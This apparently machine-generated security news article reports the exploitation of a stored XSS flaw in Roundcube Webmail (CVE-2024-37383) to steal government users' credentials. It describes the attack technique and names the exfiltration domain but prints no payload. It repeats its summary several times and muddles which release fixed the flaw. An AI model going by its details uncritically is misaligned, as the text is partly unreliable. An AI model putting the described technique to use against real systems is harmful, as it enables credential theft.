Ethical Hacking News
Hackers have exploited a medium-severity stored XSS vulnerability in the Roundcube Webmail client, allowing them to steal email credentials and sensitive data from government entities in the CIS region. The latest version of Roundcube Webmail has already been patched, but users are advised to update immediately to ensure their security.
Hackers exploited a medium-severity stored XSS vulnerability in Roundcube Webmail, allowing them to steal email credentials and sensitive data from government entities in the CIS region. The vulnerability was identified as CVE-2024-37383 and was discovered by Positive Technologies in September, but began targeting government organizations in June. The attack used emails with no visible content but only a .DOC attachment containing a hidden payload that injected malicious code into the user's page. The threat actor expects two fields - rcmloginuser and rcmloginpwd - to be filled in, either manually or automatically, which are sent to a remote server at "libcdn[.]org." Attackers use the ManageSieve plugin to exfiltrate messages from the mail server, stealing email credentials and sensitive data. The vulnerability affects earlier versions of Roundcube Webmail, specifically those earlier than 1.5.6 and versions 1.6 to 1.6.6. Users are advised to update their software immediately to ensure their security, as the latest version of Roundcube Webmail has already been patched.
Hackers have been exploiting a vulnerability in the Roundcube Webmail client, a popular open-source PHP-based solution used by commercial and government entities alike. The attack, which was discovered by Russian cybersecurity company Positive Technologies in September, but began targeting government organizations in the Commonwealth of Independent States (CIS) region as early as June, has left many wondering how such a seemingly secure system could be breached so easily.
Roundcube Webmail is often praised for its flexibility and customization options, thanks to the support of plugins that can extend its functionality. However, this very openness has proven to be a double-edged sword in this case. The vulnerability identified as CVE-2024-37383, a medium-severity stored XSS (cross-site scripting) flaw, allows malicious JavaScript code to be executed on the Roundcube page when opening a specially crafted email. This is made possible by improper processing of SVG elements in the email, which bypasses syntax checks and allows malicious code to be injected onto the user's page.
The attacks used emails with no visible content but only a .DOC attachment, containing a hidden payload that was disguised as a "href" value. According to Positive Technologies, this piece of base64-encoded JavaScript code downloads a decoy document from the mail server to distract the victim while simultaneously injecting an unauthorized login form into the HTML page, requesting messages from the mail server.
The threat actor expects two fields - rcmloginuser and rcmloginpwd (the user's login and password for the Roundcube client) to be filled in, either manually or automatically. Once filled, this data is sent to a remote server at "libcdn[.]org," which is registered recently and hosted on the Cloudflare infrastructure.
Furthermore, the attackers use the ManageSieve plugin to exfiltrate messages from the mail server, according to Positive Technologies. This means that not only are email credentials being stolen, but also sensitive data contained within those emails themselves.
The vulnerability was identified in earlier versions of Roundcube Webmail, specifically those earlier than 1.5.6 and versions 1.6 to 1.6.6. However, the researchers also noted that these attacks are not limited to just government entities in the CIS region. Given the widespread use of such webmail solutions across various sectors, it is imperative for system administrators to update their software as soon as possible.
The latest version of Roundcube Webmail, which is the recommended upgrade, is 1.6.9 and was released on September 1, fixing this vulnerability in a more recent patch. The earlier versions that were affected have already seen numerous patches - 1.5.7 and 1.6.7 were released on May 19.
This isn't the first time Roundcube Webmail has been targeted by hackers due to its open-source nature and widespread use among important organizations. Earlier this year, CISA warned about hackers targeting CVE-2023-43770, another XSS bug in Roundcube, giving federal organizations two weeks to patch.
In October 2023, Russian hackers known as ‘Winter Vivern’ were observed exploiting a zero-day XSS flaw on Roundcube, tracked as CVE-2023-5631, to breach government entities and think tanks in Europe. And in June 2023, GRU hackers of the APT28 group exploited four Roundcube flaws to steal information from email servers used by multiple organizations in Ukraine, including government agencies.
This vulnerability, like many others before it, highlights the importance of regular software updates, comprehensive cybersecurity measures, and vigilance against such threats. It serves as a stark reminder that no system is completely secure, and even the most seemingly secure webmail solutions can be vulnerable to exploitation by determined threat actors.
In light of this recent discovery, users of Roundcube Webmail are advised to update their software immediately to ensure their email credentials and sensitive data remain safe from such malicious activities. System administrators should also prioritize patching these vulnerabilities as soon as possible.
Hackers have exploited a medium-severity stored XSS vulnerability in the Roundcube Webmail client, allowing them to steal email credentials and sensitive data from government entities in the CIS region. The latest version of Roundcube Webmail has already been patched, but users are advised to update immediately to ensure their security.
Related Information:
https://www.bleepingcomputer.com/news/security/hackers-exploit-roundcube-webmail-flaw-to-steal-email-credentials/
https://nvd.nist.gov/vuln/detail/CVE-2024-37383
https://www.cvedetails.com/cve/CVE-2024-37383/
https://nvd.nist.gov/vuln/detail/CVE-2023-43770
https://www.cvedetails.com/cve/CVE-2023-43770/
https://nvd.nist.gov/vuln/detail/CVE-2023-5631
https://www.cvedetails.com/cve/CVE-2023-5631/
Published: Mon Oct 21 19:10:36 2024 by llama3.2 3B Q4_K_M
